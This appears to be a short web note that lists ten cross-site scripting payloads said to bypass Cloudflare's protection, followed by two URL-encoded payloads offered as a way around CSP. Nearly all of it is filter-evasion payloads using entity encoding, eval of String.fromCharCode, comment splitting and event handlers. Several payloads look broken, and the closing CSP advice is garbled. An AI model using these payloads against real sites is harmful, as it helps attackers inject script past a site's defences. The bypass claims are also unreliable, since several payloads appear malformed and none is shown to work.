Cloudflare's XSS protection

Cloudflare provides robust security measures to protect websites from various attacks, including Cross-Site Scripting (XSS). However, attackers may still find ways to bypass these protections. Here are 10 examples of XSS payloads that could potentially bypass Cloudflare's XSS protection:

1. Unicode encoding:

<scr&#x9Cipt>alert(1)</scr&#x9Cipt>

2. Using HTML entities:

<img src=x onerror=&#x61lert&#x28&#x27123&#x27&#x29>

3. Using JavaScript URL encoding:

<script src=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x68&#x74&#x74&#x70&#x3A&#x2F&#x2F&#x77&#x77&#x77&#x2E&#x61&#x6C&#x65&#x72&#x74&#x2E&#x63&#x6F&#x6D&#x2F&#x73&#x63&#x72&#x69&#x70&#x74&#x27&#x29>

4. Using JavaScript encoding:

<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>

5. Using CSS expressions:

<style>@import'\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003A\u0061\u006C\u0065\u0072\u0074\u0028\u0027\u0068\u0074\u0074\u0070\u003A\u002F\u002F\u0077\u0077\u0077\u002E\u0061\u006C\u0065\u0072\u0074\u002E\u0063\u006F\u006D\u002F\u0073\u0063\u0072\u0069\u0070\u0074\u0027\u0029';</style>

6. Using JavaScript comments:

<script>/*-/**/alert(1)/*-/*-->/*</script>

7. Using event handlers:

<body onload=alert(1)>

8. Using JavaScript encoding with comments:

<script>eval(String.fromCharCode(/*-*/97/*-*/,/*-*/108/*-*/,/*-*/101/*-*/,/*-*/114/*-*/,/*-*/116/*-*/,/*-*/40/*-*/,/*-*/49/*-*/,/*-*/41/*-*/))</script>

9. Using JavaScript encoding with whitespace:

<script>eval(String.fromCharCode( 97, 108, 101, 114, 116, 40, 49, 41 ))</script>

10. Using JavaScript encoding with different encoding schemes:

<script>eval(String.fromCharCode(0x61,0x6C,0x65,0x72,0x74,0x28,0x31,0x29))</script>

If CSP policies blocked you while trying XSS, be sure to try two separate XSS payloads (encoded) one after another, this may help you bypass the file.

1- %3C/script%20%3E

2- mitsecXSS%22%3E%3Cinput%20%00%20onControl%20hello%20oninput=confirm(1)%20x%3E